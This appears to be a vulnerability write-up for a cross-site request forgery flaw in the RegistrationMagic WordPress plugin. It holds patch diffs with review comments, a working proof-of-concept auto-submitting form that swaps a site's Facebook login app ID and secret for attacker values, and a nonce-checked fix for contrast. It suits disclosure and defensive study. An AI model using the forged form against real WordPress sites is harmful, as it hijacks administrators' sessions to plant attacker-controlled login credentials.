             $submission_id= isset($_POST['submission_id']) ? absint($_POST['submission_id']) : 0;
             empty($submission_id) ? wp_send_json_error(array('msg'=>__('Submission not valid.','custom-registration-form-builder-with-submission-manager'))) : '';
             $submission = new RM_Submissions();
-            if(!$submission->load_from_db($submission_id)){
+            if(!$submission->load_from_db($submission_id)) {
                 wp_send_json_error(array('msg'=>__('Submission not valid.','custom-registration-form-builder-with-submission-manager')));
             }
             $transaction = $_POST['transaction'];
             $log_id = isset($_POST['payment_id']) ? absint($_POST['payment_id']) : 0;
-            $status = isset($transaction['status']) ? strtolower($transaction['status']) : 'Pending';
-            $status = ucfirst($status);
+            //$status = isset($transaction['status']) ? strtolower($transaction['status']) : 'Pending';
+            //$status = ucfirst($status);
             $txn_id = isset($transaction['id']) ? $transaction['id'] : '';
+            $status = $this->validate_sdk_payment( $txn_id );
             $log_entry_id = RM_DBManager::update_row('PAYPAL_LOGS', $log_id, array(
                         'status' => $status,
                         'txn_id' => $txn_id,
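Review bot: the substantive change here is that `$status` no longer comes from the client-supplied `$_POST['transaction']['status']` but from `validate_sdk_payment()`, so a caller can no longer mark a log entry Completed by posting that string; good. Delete the two commented-out assignments rather than leaving them. `$txn_id` is still taken raw from `$_POST` and later interpolated into a URL path; validate it against the expected capture-id format, or at least `rawurlencode()` it, before use.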
@@ -351,7 +351,6 @@
             }
             if($status == 'Completed') {
                 if ($_POST['user_id']){
-                    $gopt = new RM_Options;
                     if ($check_setting == "yes"){
                         $user_service = new RM_User_Services();
                         $user_service->activate_user_by_id($_POST['user_id']);
@@ -368,11 +367,82 @@
                 $response['log_id']= $log_id;
             }
             wp_send_json_success($response);
-        }
-        else{
+        } else {
             wp_send_json_error(array('msg'=>__('Submission not valid.','custom-registration-form-builder-with-submission-manager')));
         }
     }
+
+    public function validate_sdk_payment( $transaction_id ) {
+        $gopts = new RM_Options;
+        $sandbox =  $gopts->get_value_of('paypal_test_mode') === 'yes' ? true : false;
+
+        // PayPal API keys
+        $client_id = $gopts->get_value_of('paypal_client_id');
+        $secret    = $gopts->get_value_of('paypal_secret_key');
+
+        // PayPal REST API endpoint
+        $paypal_api = $sandbox
+            ? 'https://api.sandbox.paypal.com'
+            : 'https://api.paypal.com';
+
+        /*
+        * 1. Get OAuth Access Token
+        */
+        $token_response = wp_remote_post( "$paypal_api/v1/oauth2/token", [
+            'method'      => 'POST',
+            'timeout'     => 60,
+            'headers'     => [
+                'Authorization' => 'Basic ' . base64_encode( "$client_id:$secret" ),
+            ],
+            'body'        => 'grant_type=client_credentials',
+        ]);
+
+        if ( is_wp_error( $token_response ) ) {
+            return 'Pending';
+        }
+
+        $token_body = json_decode( wp_remote_retrieve_body( $token_response ), true );
+
+        if ( empty( $token_body['access_token'] ) ) {
+            return 'Pending';
+        }
+
+        $access_token = $token_body['access_token'];
+
+        /*
+        * 2. Fetch transaction details (only to check if it exists)
+        */
+        $payment_response = wp_remote_get( "$paypal_api/v2/payments/captures/$transaction_id", [
+            'timeout' => 60,
+            'headers' => [
+                'Authorization' => "Bearer $access_token",
+                'Content-Type'  => 'application/json',
+            ],
+        ]);
+
+        if ( is_wp_error( $payment_response ) ) {
+            return 'Pending';
+        }
+
+        $payment_data = json_decode( wp_remote_retrieve_body( $payment_response ), true );
+
+        if ( empty( $payment_data['status'] ) ) {
+            return 'Pending';
+        }
+
+        /*
+        * 3. Validate PayPal status only
+        */
+        if ( $payment_data['status'] !== 'COMPLETED' ) {
+            return 'Pending';
+        }
+
+        /*
+        * SUCCESS
+        */
+        return 'Completed';
+    }
+
     public function demo(){
         $response['msg'] .= '<div id="rmform">';
         $response['msg'] .= "<br><br><div class='rm-post-sub-msg'>";
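Review bot: `validate_sdk_payment()` confirms the capture exists and is `COMPLETED` but, as its own comment says, nothing else: it does not compare the capture's amount and currency with the price expected for `$submission_id`, and it does not check that `$transaction_id` has not already been recorded against another submission, so one small real capture could satisfy several or more expensive submissions. Compare amount and currency against the submission's pricing and reject capture ids already present in `PAYPAL_LOGS`. Also `rawurlencode()` `$transaction_id` before building the request path, and log `is_wp_error()` results rather than silently returning 'Pending', which hides credential problems from the admin.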
@@ -406,6 +476,7 @@
         }
         $response['msg'] .= '</div>';
     }
+
     public function charge_popup($data, $pricing_details){
         $submission_id = $data->submission_id;
         $form_id= $data->form_id;
@@ -496,6 +567,7 @@
         ob_end_clean();
         return $data;
     }
+
     public function refund() {

     }
@@ -504,5 +576,4 @@

     }

-}
-
+}
 No newline at end of file
--- a/custom-registration-form-builder-with-submission-manager/services/class_rm_user_services.php
+++ b/custom-registration-form-builder-with-submission-manager/services/class_rm_user_services.php
@@ -799,7 +799,7 @@
                         }
                     }
                 } else
-                    die('Error: Unable to fetch email address from Facebbok.');
+                    die(esc_html__('Error: Unable to fetch email address from Facebook.', 'custom-registration-form-builder-with-submission-manager'));
             }
         }

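Review bot: beyond the typo fix and the `esc_html__()` wrapping, this path still calls plain `die()` from a service class, which ends the request with a bare string and a 200 status. Suggest `wp_die( esc_html__( 'Error: Unable to fetch email address from Facebook.', 'custom-registration-form-builder-with-submission-manager' ), '', array( 'response' => 400 ) )` so the failure carries a proper status and the standard WordPress error page. The `} else` followed by an unbraced `die(...)` is also easy to misread; braces would help.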
@@ -869,6 +869,7 @@
                 if(empty($accessToken))
                     break;

+
                 $gopts = new RM_Options;
                 $fb_app_id = $gopts->get_value_of('facebook_app_id');
                 $fb_app_secret = $gopts->get_value_of('facebook_app_secret');
@@ -884,7 +885,7 @@
             case 'google':
                 $login_success = $this->google_login_callback(sanitize_text_field($_POST['token']), $user_email);
                 break;
-            case 'instagram':
+            /* case 'instagram':
                 $response = wp_remote_get('https://graph.instagram.com/v12.0/me?fields=id,username&access_token='.sanitize_text_field($_POST['token']));
                 $response = json_decode(wp_remote_retrieve_body($response));
                 if(isset($response->username)) {
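Review bot: the Instagram branch is disabled by opening a `/*` block comment at `case 'instagram':` instead of deleting it, which leaves dead code inside the switch and makes this hunk depend on the `*/` in the following hunk; applied on its own the file does not parse. Suggest removing the case outright (history stays in version control) and, while here, guarding `$_POST['token']` in the `google` case with an `isset()` check before passing it to `sanitize_text_field()`.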
@@ -892,7 +893,7 @@
                     $user_fname = '';
                     $login_success = true;
                 }
-                break;
+                break; */
             default:
                 break;
         }
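Review bot: with the `instagram` case commented out, a request carrying `type=instagram` now falls through to `default: break;` and leaves `$login_success` false with no message, so a disabled provider fails silently. Suggest an explicit error or log entry in `default` for unknown or disabled providers, and removing the commented block rather than keeping it behind `break; */`.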

Proof of Concept (PHP)

NOTICE:

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-24374 - RegistrationMagic <= 6.0.6.9 - Cross-Site Request Forgery

<?php
/**
 * Proof of Concept for CVE-2026-24374
 * Targets RegistrationMagic plugin <= 6.0.6.9
 * Exploits missing nonce validation in social login settings update.
 *
 * Usage: Place this script on an attacker-controlled server.
 *        Send the URL to a logged-in WordPress administrator.
 *        When visited, the script will automatically submit a forged request
 *        to change the Facebook login settings to attacker-controlled values.
 */

// Configuration
$target_url = 'http://vulnerable-site.com/wp-admin/admin.php';
$attacker_app_id = 'ATTACKER_FACEBOOK_APP_ID';
$attacker_app_secret = 'ATTACKER_FACEBOOK_APP_SECRET';

// The page parameter triggers the vulnerable controller
$action_url = $target_url . '?page=rm_login_sett_manage';

// Craft the malicious form that auto-submits via JavaScript
?>
<!DOCTYPE html>
<html>
<head>
    <title>Loading...</title>
    <script>
        window.onload = function() {
            document.getElementById('exploitForm').submit();
        };
    </script>
</head>
<body>
    <h2>Please wait...</h2>
    <form id="exploitForm" action="<?php echo htmlspecialchars($action_url); ?>" method="POST">
        <!-- Type 'fb' targets Facebook login integration -->
        <input type="hidden" name="type" value="fb" />
        <!-- Enable Facebook login -->
        <input type="hidden" name="enable_facebook" value="1" />
        <!-- Replace legitimate Facebook App ID with attacker's ID -->
        <input type="hidden" name="facebook_app_id" value="<?php echo htmlspecialchars($attacker_app_id); ?>" />
        <!-- Replace legitimate Facebook App Secret with attacker's secret -->
        <input type="hidden" name="facebook_app_secret" value="<?php echo htmlspecialchars($attacker_app_secret); ?>" />
        <!-- The form uses the same field names as the legitimate plugin form -->
        <input type="hidden" name="rm_slug" value="login-integrations" />
        <input type="hidden" name="rm_action" value="save_login_integrations" />
        <!-- No nonce parameter is included, exploiting the missing validation -->
    </form>
</body>
</html>
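As an added example (not the plugin's code and not the fix shipped in 6.0.7.0), here is a handler in the shape the advisory describes, saving POSTed social-login values without a nonce check, beside a nonce-protected version; the function names, option keys and the `_rm_nonce` field name are assumptions.

```php
<?php
// Illustrative only (not RegistrationMagic's code): a settings handler of
// the shape the advisory describes, saving POSTed social-login values after
// a form check but with no nonce, next to a nonce-protected version.
// Function names, the option keys and the '_rm_nonce' field are assumptions.

function rm_demo_store_facebook_settings( array $request ) {
    update_option( 'demo_facebook_app_id', sanitize_text_field( wp_unslash( $request['facebook_app_id'] ?? '' ) ) );
    update_option( 'demo_facebook_app_secret', sanitize_text_field( wp_unslash( $request['facebook_app_secret'] ?? '' ) ) );
}

// BEFORE: any POST that reaches this admin page is saved. A hidden form on
// another origin, submitted by a logged-in administrator's browser, carries
// the admin's cookies and so passes straight through to the save.
function rm_demo_save_login_integrations_vulnerable( array $request ) {
    if ( ( $request['type'] ?? '' ) !== 'fb' ) {
        return false;
    }
    rm_demo_store_facebook_settings( $request );
    return true;
}

// AFTER: require the capability and a nonce bound to this action. The nonce
// is derived from the current user's session and the action name, so a page
// on another origin cannot read or forge it, and the forged POST is rejected.
function rm_demo_save_login_integrations_fixed( array $request ) {
    if ( ! current_user_can( 'manage_options' ) ) {
        return false;
    }
    $nonce = isset( $request['_rm_nonce'] ) ? sanitize_text_field( wp_unslash( $request['_rm_nonce'] ) ) : '';
    // wp_verify_nonce() returns false for a missing, expired or foreign nonce.
    if ( ! wp_verify_nonce( $nonce, 'rm_save_login_integrations' ) ) {
        return false;
    }
    if ( ( $request['type'] ?? '' ) !== 'fb' ) {
        return false;
    }
    rm_demo_store_facebook_settings( $request );
    return true;
}

// The legitimate settings form must emit the matching field; in an admin
// controller check_admin_referer() can replace the manual verification above.
function rm_demo_render_nonce_field() {
    wp_nonce_field( 'rm_save_login_integrations', '_rm_nonce' );
}
```

Because the PoC form above carries no `_rm_nonce` value, the fixed handler returns false before touching any option, while the legitimate form rendered with `rm_demo_render_nonce_field()` still saves.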
